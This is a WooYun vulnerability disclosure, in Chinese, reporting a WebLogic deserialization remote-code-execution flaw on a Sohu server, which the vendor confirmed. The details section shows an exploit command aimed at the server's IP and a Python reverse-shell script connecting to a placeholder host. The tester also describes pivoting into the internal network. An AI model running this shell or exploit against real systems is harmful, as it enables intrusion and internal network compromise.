当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190567

漏洞标题:搜狐某服务器的存在命令执行漏洞威胁内网安全

相关厂商:搜狐

漏洞作者: 李长歌

提交时间:2016-03-30 00:04

修复时间:2016-05-14 00:30

公开时间:2016-05-14 00:30

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

简要描述:

搜狐某个服务器配置不当,存在远程命令执行漏洞 可威胁内网安全

详细说明:

服务器 123.125.123.26 存在weblogic 反序列化漏洞,没想到搜狐也存在这样的漏洞。

python weblogic_exp.py http://123.125.123.26:8080
weblogic unserialize vul is ok 123.125.123.26:8080
WebPath: /DATA3/apps/psoft/webserv/HROUT


QQ截图20160329224040.png


可以直接上传一个脚本反弹一个shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((" ip",23333));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])


先来查看一下IP,可以发现该服务器是出于内网的,所以内部信息可以直接代理访问,或者进一步的渗透

QQ截图20160329222538.png


QQ截图20160329222621.png


搜狐的内部安全中心

QQ截图20160329222445.png

漏洞证明:

简单探测下内网。

QQ截图20160329224123.png

修复方案:

修复下吧

版权声明:转载请注明来源 李长歌@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-03-30 00:25

厂商回复:

感谢支持

最新状态:

暂无


漏洞评价:

评价

  1. 2016-03-30 10:20 | feiyu ( 普通白帽子 | Rank:112 漏洞数:29 )

    前排

  2. 2016-05-14 00:39 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    weblogic_exp.py 怎么写的啊,还可以取到路径啊